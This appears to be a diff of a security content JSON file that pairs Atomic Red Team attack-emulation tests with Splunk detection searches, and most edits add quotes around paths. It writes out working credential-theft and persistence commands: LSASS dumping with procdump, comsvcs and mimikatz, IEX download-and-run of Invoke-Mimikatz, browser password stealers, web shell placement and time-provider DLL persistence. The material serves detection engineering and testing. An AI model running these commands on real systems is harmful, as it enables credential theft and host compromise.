-Type Directory \"PathToAtomicsFolder\\T1555.003\\bin\\\" -ErrorAction ignore -Force | Out-Null\nInvoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe -OutFile \"#{webbrowserpassview_path}\"\n" } ], "executor": { - "command": "Start-Process #{webbrowserpassview_path}\nStart-Sleep -Second 4\nStop-Process -Name \"WebBrowserPassView\"\n", + "command": "Start-Process \"#{webbrowserpassview_path}\"\nStart-Sleep -Second 4\nStop-Process -Name \"WebBrowserPassView\"\n", "name": "powershell", "elevation_required": true } @@ -320944,12 +323848,12 @@ { "description": "Google Chrome must be on the device.\n", "prereq_command": "'if ((Test-Path \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\") -Or (Test-Path \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\")) {exit 0} else {exit 1}'\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n$installer = \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi\"\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi\nmsiexec /i $installer /qn\nStart-Process -FilePath \"chrome.exe\"\nStop-Process -Name \"chrome\"\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\n$installer = \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi\"\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ChromeStandaloneSetup64.msi\" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi\nmsiexec /i $installer /qn\nStart-Process -FilePath \"chrome.exe\"\nStop-Process -Name \"chrome\"\n" }, { "description": "BrowserCollector must exist in the bin directory\n", "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\T1555.003\\bin\\BrowserCollector.exe\") {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest \"https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe\" -Outfile: \"PathToAtomicsFolder\\T1555.003\\bin\\BrowserCollector.exe\"" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\T1555.003\\bin\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/SaulBerrenson/BrowserStealer/releases/download/1.0.0.4/BrowserCollector_x64.exe\" -Outfile: \"PathToAtomicsFolder\\T1555.003\\bin\\BrowserCollector.exe\"" }, { "description": "Login Data file that is a copy of a chrome Login Data that contains credentials for the tool to \"steal.\" Must exist at the specified path.\n", @@ -321361,7 +324265,8 @@ "3CX Supply Chain Attack", "AgentTesla", "RedLine Stealer", - "FIN7" + "FIN7", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -322561,7 +325466,7 @@ { "name": "Modification Of Wallpaper", "description": "This analytic identifies suspicious modification of registry to deface or change the wallpaper of a compromised machines as part of its payload. This technique was commonly seen in ransomware like REVIL where it create a bitmap file contain a note that the machine was compromised and make it as a wallpaper.", - "search": "`sysmon` EventCode =13 (TargetObject= \"*\\\\Control Panel\\\\Desktop\\\\Wallpaper\" AND Image != \"*\\\\explorer.exe\") OR (TargetObject= \"*\\\\Control Panel\\\\Desktop\\\\Wallpaper\" AND Details = \"*\\\\temp\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Image TargetObject Details Computer process_guid process_id user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `modification_of_wallpaper_filter`", + "search": "`sysmon` EventCode =13 (TargetObject= \"*\\\\Control Panel\\\\Desktop\\\\Wallpaper\" AND Image != \"*\\\\explorer.exe\") OR (TargetObject= \"*\\\\Control Panel\\\\Desktop\\\\Wallpaper\" AND Details = \"*\\\\temp\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Image TargetObject Details Computer process_guid process_id user_id | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `modification_of_wallpaper_filter`", "tags": { "name": "Modification Of Wallpaper", "analytic_story": [ @@ -325025,7 +327930,7 @@ } ], "command_list": [ - "xcopy /I /Y \\T1505.003\\src C:\\inetpub\\wwwroot\n" + "xcopy /I /Y \"\\T1505.003\\src\" C:\\inetpub\\wwwroot\n" ], "commands": [], "queries": [], @@ -325060,12 +327965,12 @@ "dependencies": [ { "description": "Web shell must exist on disk at specified location (#{web_shells})\n", - "prereq_command": "if (Test-Path #{web_shells}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory #{web_shells} -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp\" -OutFile \"#{web_shells}/b.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp\" -OutFile \"#{web_shells}/tests.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx\" -OutFile \"#{web_shells}/cmd.aspx\"\n" + "prereq_command": "if (Test-Path \"#{web_shells}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"#{web_shells}\" -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp\" -OutFile \"#{web_shells}/b.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp\" -OutFile \"#{web_shells}/tests.jsp\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx\" -OutFile \"#{web_shells}/cmd.aspx\"\n" } ], "executor": { - "command": "xcopy /I /Y #{web_shells} #{web_shell_path}\n", + "command": "xcopy /I /Y \"#{web_shells}\" #{web_shell_path}\n", "cleanup_command": "del #{web_shell_path}\\b.jsp /q >nul 2>&1\ndel #{web_shell_path}\\tests.jsp /q >nul 2>&1\ndel #{web_shell_path}\\cmd.aspx /q >nul 2>&1\n", "name": "command_prompt" } @@ -325861,7 +328766,7 @@ { "name": "Detect Exchange Web Shell", "description": "The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\\HttpProxy\\owa\\auth\\`, `\\inetpub\\wwwroot\\aspnet_client\\`, and `\\HttpProxy\\OAB\\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN (\"*\\\\HttpProxy\\\\owa\\\\auth\\\\*\", \"*\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\*\", \"*\\\\HttpProxy\\\\OAB\\\\*\") Filesystem.file_name IN( \"*.aspx\", \"*.ashx\") by _time span=1h Filesystem.user Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter`", "tags": { "name": "Detect Exchange Web Shell", "analytic_story": [ @@ -326031,7 +328936,9 @@ "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", - "CISA AA22-264A" + "CISA AA22-264A", + "Citrix ShareFile RCE CVE-2023-24489", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -326293,7 +329200,8 @@ "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware", - "CISA AA22-264A" + "CISA AA22-264A", + "Flax Typhoon" ], "asset_type": "Endpoint", "cis20": [ @@ -328434,7 +331342,7 @@ "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \ncertutil.exe -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\\temp\\atomic.pfx\n", "$mypwd = ConvertTo-SecureString -String \"AtomicRedTeam\" -Force -AsPlainText\n$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My\nSet-Location Cert:\\LocalMachine\\My\nGet-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd\n", "$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My\nSet-Location Cert:\\LocalMachine\\My\nExport-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer\n", - "\\..\\ExternalPayloads\\x64\\mimikatz.exe \"crypto::certificates /systemstore:local_machine /store:my /export\" exit\n", + "\"\\..\\ExternalPayloads\\x64\\mimikatz.exe\" \"crypto::certificates /systemstore:local_machine /store:my /export\" exit\n", "foreach($i in @(\".key\",\".pgp\",\".gpg\",\".ppk\",\".p12\",\".pem\",\".pfx\",\".cer\",\".p7b\",\".asc\",\".crt\")){Get-ChildItem -Path c:\\ -Depth 3 -File -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.name -Match \"$i$\"}}\n", "for %i in (\\.key \\.pgp \\.gpg \\.ppk \\.p12 \\.pem \\.pfx \\.cer \\.p7b \\.asc) do (dir c:\\ /b /s .key | findstr /e \"%i\")\n", "for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name \"*${i}\" 2>/dev/null;done;\n", @@ -328716,12 +331624,12 @@ "dependencies": [ { "description": "Mimikatz must exist on disk at specified location (#{mimikatz_exe})\n", - "prereq_command": "if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(\".zip\") }\n$basePath = Split-Path #{mimikatz_exe} | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\" $basePath\n" + "prereq_command": "if (Test-Path \"#{mimikatz_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\" -UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(\".zip\") }\n$basePath = Split-Path \"#{mimikatz_exe}\" | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\" $basePath\n" } ], "executor": { - "command": "#{mimikatz_exe} \"crypto::certificates /systemstore:local_machine /store:my /export\" exit\n", + "command": "\"#{mimikatz_exe}\" \"crypto::certificates /systemstore:local_machine /store:my /export\" exit\n", "name": "command_prompt", "elevation_required": true } @@ -329536,7 +332444,7 @@ { "description": "Computer must have Ruby Installed", "prereq_command": "try {if (ruby -v) {exit 0} else {exit 1}} catch {exit 1}", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\rubyinstaller-2.7.1-1-x64.exe https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe\n$file1= \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubyinstaller-2.7.1-1-x64.exe\"\nStart-Process $file1 /S;" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubyinstaller-2.7.1-1-x64.exe\" https://github.com/oneclick/rubyinstaller2/releases/download/RubyInstaller-2.7.1-1/rubyinstaller-2.7.1-1-x64.exe\n$file1= \"PathToAtomicsFolder\\..\\ExternalPayloads\\rubyinstaller-2.7.1-1-x64.exe\"\nStart-Process $file1 /S;" }, { "description": "Computer must have Evil-WinRM installed", @@ -336133,8 +339041,8 @@ } ], "command_list": [ - "net stop w32time\nCopy-Item $PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n", - "net stop w32time\nCopy-Item $PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n" + "net stop w32time\nCopy-Item \"$PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll\" C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n", + "net stop w32time\nCopy-Item \"$PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll\" C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n" ], "commands": [], "queries": [], @@ -336154,7 +339062,7 @@ "windows" ], "executor": { - "command": "net stop w32time\nCopy-Item $PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n", + "command": "net stop w32time\nCopy-Item \"$PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll\" C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n", "cleanup_command": "net stop w32time\nreg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\AtomicTest\" /f\nrm -force C:\\Users\\Public\\AtomicTest.dll\nnet start w32time\n", "name": "powershell", "elevation_required": true @@ -336168,7 +339076,7 @@ "windows" ], "executor": { - "command": "net stop w32time\nCopy-Item $PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n", + "command": "net stop w32time\nCopy-Item \"$PathToAtomicsFolder\\T1547.003\\bin\\AtomicTest.dll\" C:\\Users\\Public\\AtomicTest.dll\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_SZ /v \"DllName\" /d \"C:\\Users\\Public\\AtomicTest.dll\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"Enabled\" /d \"1\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"InputProvider\" /d \"1\" /f\nnet start w32time\n", "cleanup_command": "net stop w32time\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_SZ /v \"DllName\" /d \"C:\\Windows\\SYSTEM32\\w32time.DLL\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"Enabled\" /d \"0\" /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\NtpServer\" /t REG_DWORD /v \"InputProvider\" /d \"0\" /f\nrm -force C:\\Users\\Public\\AtomicTest.dll\nnet start w32time\n", "name": "powershell", "elevation_required": true @@ -336533,7 +339441,7 @@ { "name": "Time Provider Persistence Registry", "description": "This analytic is to detect a suspicious modification of time provider registry for persistence and autostart. This technique can allow the attacker to persist on the compromised host and autostart as soon as the machine boot up. This TTP can be a good indicator of suspicious behavior since this registry is not commonly modified by normal user or even an admin.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders*\") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `time_provider_persistence_registry_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders*\") BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `time_provider_persistence_registry_filter`", "tags": { "name": "Time Provider Persistence Registry", "analytic_story": [ @@ -336551,7 +339459,7 @@ "Installation", "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1547.003", "T1547" @@ -340506,7 +343414,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "The Windows Event Log Service shutdown on $ComputerName$", + "message": "The Windows Event Log Service shutdown on $dest$", "mitre_attack_id": [ "T1070", "T1070.001" @@ -340516,7 +343424,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -340593,7 +343501,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -343048,14 +345956,14 @@ } ], "command_list": [ - "\\..\\ExternalPayloads\\procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "\"\\..\\ExternalPayloads\\procdump.exe\" -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", "C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\\lsass-comsvcs.dmp full\n", - "\\..\\ExternalPayloads\\Outflank-Dumpert.exe\n", + "\"\\..\\ExternalPayloads\\Outflank-Dumpert.exe\"\n", "%temp%\\nanodump.x64.exe -w \"%temp%\\nanodump.dmp\"\n", - "\\..\\ExternalPayloads\\x64\\mimikatz.exe \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\n", + "\"\\..\\ExternalPayloads\\x64\\mimikatz.exe\" \"sekurlsa::minidump %tmp%\\lsass.DMP\" \"sekurlsa::logonpasswords full\" exit\n", "pypykatz live lsa\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nIEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump\n", - "..\\ExternalPayloads\\procdump.exe -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", + "\"\\..\\ExternalPayloads\\procdump.exe\" -accepteula -mm lsass.exe C:\\Windows\\Temp\\lsass_dump.dmp\n", "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\n", "$exePath = resolve-path \"$env:ProgramFiles\\dotnet\\shared\\Microsoft.NETCore.App\\5*\\createdump.exe\"\n& \"$exePath\" -u -f $env:Temp\\dotnet-lsass.dmp (Get-Process lsass).id\n", "C:\\Windows\\Temp\\xordump.exe -out C:\\Windows\\Temp\\lsass-xordump.t1003.001.dmp -x 0x41\n", @@ -343096,12 +346004,12 @@ "dependencies": [ { "description": "ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})\n", - "prereq_command": "if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump -Force\nNew-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null\nCopy-Item PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump\\Procdump.exe #{procdump_exe} -Force\n" + "prereq_command": "if (Test-Path \"#{procdump_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Procdump.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump\" -Force\nNew-Item -ItemType Directory (Split-Path \"#{procdump_exe}\") -Force | Out-Null\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\Procdump\\Procdump.exe\" \"#{procdump_exe}\" -Force\n" } ], "executor": { - "command": "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n", + "command": "\"#{procdump_exe}\" -accepteula -ma lsass.exe #{output_file}\n", "cleanup_command": "del \"#{output_file}\" >nul 2> nul\n", "name": "command_prompt", "elevation_required": true @@ -343139,12 +346047,12 @@ "dependencies": [ { "description": "Dumpert executable must exist on disk at specified location (#{dumpert_exe})\n", - "prereq_command": "if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null\nInvoke-WebRequest \"https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe\" -OutFile #{dumpert_exe}\n" + "prereq_command": "if (Test-Path \"#{dumpert_exe}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -ItemType Directory (Split-Path \"#{dumpert_exe}\") -Force | Out-Null\nInvoke-WebRequest \"https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe\" -OutFile \"#{dumpert_exe}\"\n" } ], "executor": { - "command": "#{dumpert_exe}\n", + "command": "\"#{dumpert_exe}\"\n", "cleanup_command": "del C:\\windows\\temp\\dumpert.dmp >nul 